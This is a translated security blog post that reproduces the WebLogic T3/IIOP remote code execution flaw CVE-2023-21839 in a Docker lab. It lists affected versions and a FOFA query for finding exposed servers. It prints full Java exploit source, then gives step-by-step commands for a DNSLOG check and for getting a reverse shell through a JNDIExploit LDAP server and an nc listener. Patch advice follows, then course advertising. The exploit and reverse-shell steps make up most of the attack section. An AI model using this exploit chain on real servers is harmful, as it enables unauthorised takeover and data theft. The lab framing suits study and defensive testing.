WebLogic has a remote code execution vulnerability (CVE-2023-21839/CNVD-2023-04389). Due to a flaw in the Weblogic IIOP/T3 protocol, when the IIOP/T3 protocol is turned on, an unauthenticated attacker is allowed to pass the IIOP/T3 protocol. Network access attacks pose security risks to WebLogic Server. If the vulnerability is successfully exploited, WebLogic Server may be taken over by an attacker and execute arbitrary commands, causing the server to collapse or causing serious sensitive data leakage.
Hazard level: high
-
CNVD-2023-04389
-
CVE-2023-21839
Affected version
The scope of impact of this vulnerability is as follows:
12.2.1.2.0
12.2.1.1.0
12.2.1.3.0
12.2.1.0.0
12.2.1.4.0
14.1.1.0.0
12.1.2.0.0
12.1.3.0.0
10.3.6.0
FOFA Query:
app=”BEA-WebLogic-Server” || app=”Weblogic_interface_7001″ |
Vulfocus has integrated this vulnerability environment and is available through the following environments:
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.2.0-jdk-release |
Vulnerability recurrence
This time we use the installation environment-docker to deploy Vulhub
1. Install the latest version of docker
Note: Some Linux systems are not compatible with the latest version of Docker. The solution is to upgrade the Linux kernel or reduce the Docker version. The specific operations for replacing Docker are as follows:
curl -s https://get.docker.com/ | sh
(1) Specify version: sudo apt-get install docker-ce=17.12.1~ce-0~ubuntu
(2) Uninstall docker-ce
sudo apt-get autoremove docker-ce
(3) Display stable and usable version
sudo apt-cache madison docker-ce
2. Start the docker service
service docker start
3. Install pip
apt-get install python-pip
4. Install compose
pip install docker-compose (If the network speed is too slow, download and upload to the virtual machine locally)
5. Configure docker acceleration
curl -sSL https://get.daocloud.io/daotools/set_mirror.sh | sh -s http://f1361db2.m.daocloud.io
6. Download or clone Vulhub
git clone https://github.com/vulhub/vulhub.git (If the network speed is too slow, download and upload to the virtual machine locally)
7. Enter Vulhub
cd vulhub-master/
8. Enter the directory of a certain vulnerability/environment
cd /home/vulhub1/Desktop/vulhub-master/weblogic/CVE-2023-21839
9. Compile vulnerability environment
sudo docker-compose build (some require compilation, some do not, this vulnerability does not require it)
10. Start the vulnerability environment
docker-compose up -d
11. Check the vulnerability environment
docker ps
12. Access the vulnerability environment
VPS public IP + mapped port, you can view the remade.md file in each vulnerability directory, use cat to view
13. End the vulnerability environment (no need to compile next time, the command must be executed in the current directory)
docker-compose down
14. Visit http://127.0.0.1:7001/console/login/LoginForm.jsp, the vulnerability environment has been raised
Note: The purpose of this time is to rebound the shell of vulnerability range server A
How to use
DNSLOG detection
EXP link: https://github.com/DXask88MA/Weblogic-CVE-2023-21839 (jar package form)
Source code poc:
import javax.naming.Context; import javax.naming.InitialContext; import javax.naming.NamingException; import java.lang.reflect.Field; import java.util.Hashtable; import java.util.Random; public class CVE_2023_21839 { static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory"; static String HOW_TO_USE="[*]java -jar target ip: port ldap address\\ e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/ 1111"; private static InitialContext getInitialContext(String url)throws NamingException { Hashtable<String,String> env = new Hashtable<String,String>(); env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY); env.put(Context.PROVIDER_URL, url); return new InitialContext(env); } public static void main(String args[]) throws Exception { if(args.length <2){ System.out.println(HOW_TO_USE); System.exit(0); } String t3Url = args[0]; String ldapUrl = args[1]; InitialContext c=getInitialContext("t3://" + t3Url); Hashtable<String,String> env = new Hashtable<String,String>(); env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory"); weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference(); Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment"); jndiEnvironment.setAccessible(true); jndiEnvironment.set(f,env); Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName"); remoteJNDIName.setAccessible(true); remoteJNDIName.set(f,ldapUrl); String bindName = new Random(System.currentTimeMillis()).nextLong() + ""; try{ c.bind(bindName,f); c.lookup(bindName); }catch(Exception e){ } } }
(1) Use attack machine B to execute the exp script to attack range A. Executing exp requires a java 1.8 environment. I use kali2021.
(2) You need to uninstall the source jdk11 first, and then install jdk1.8
Reference: https://www.yuque.com/u2114382/odrch9/uhac2mnslbctxpwd
(3) After the attacking machine executes the following command, refresh the dnslog.
java -jar Weblogic-CVE-2023-21839.jar shooting range ip:7001 ldap://kejajb.dnslog.cn
Rebound shell
(1) First you need to use the JNDIExploit-1.4-SNAPSHOT.jar tool to start the ladp service
Download link: https://github.com/WhiteHSBG/JNDIExploit
(2) After downloading, you need to build the ldap service on server C. In fact, it means starting the jar package above.
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i server Cip
(3) After the startup is completed, port monitoring is required. Server C directly starts nc for monitoring.
(4) At this time, use attack machine B to execute exp
java -jar Weblogic-CVE-2023-21839.jar Range IP:7001 ldap://ldap server IP:1389/Basic/ReverseShell/ldap server IP/nc listening port
(5) Check ldap server C at this time and successfully rebound the shell
Repair suggestions
Currently, the manufacturer has released an upgrade patch to fix the vulnerability. The link to obtain the patch is:
Mitigation disables T3 and IIOP
Patch download link:
https://support.oracle.com/rs?type=doc & id=2917213.2
Source: https://www.freebuf.com/vuls/364212.html
Statement: The technologies, ideas and tools involved in this article are only for safety-oriented learning and exchange purposes. No one may use them for legal purposes or profit, otherwise you will bear the consequences. All penetrations require authorization!
@Learn more penetration skills! Experience actual shooting exercises
Receive a free safety learning package!
Penetration tools
Technical documents, books
Interview questions
Help you stand out in interviews
video
Basic to advanced
Environment construction, HTML, PHP, MySQL basic learning, information collection, SQL injection, XSS, CSRF, brute force cracking, etc.
Emergency Response Notes
learning route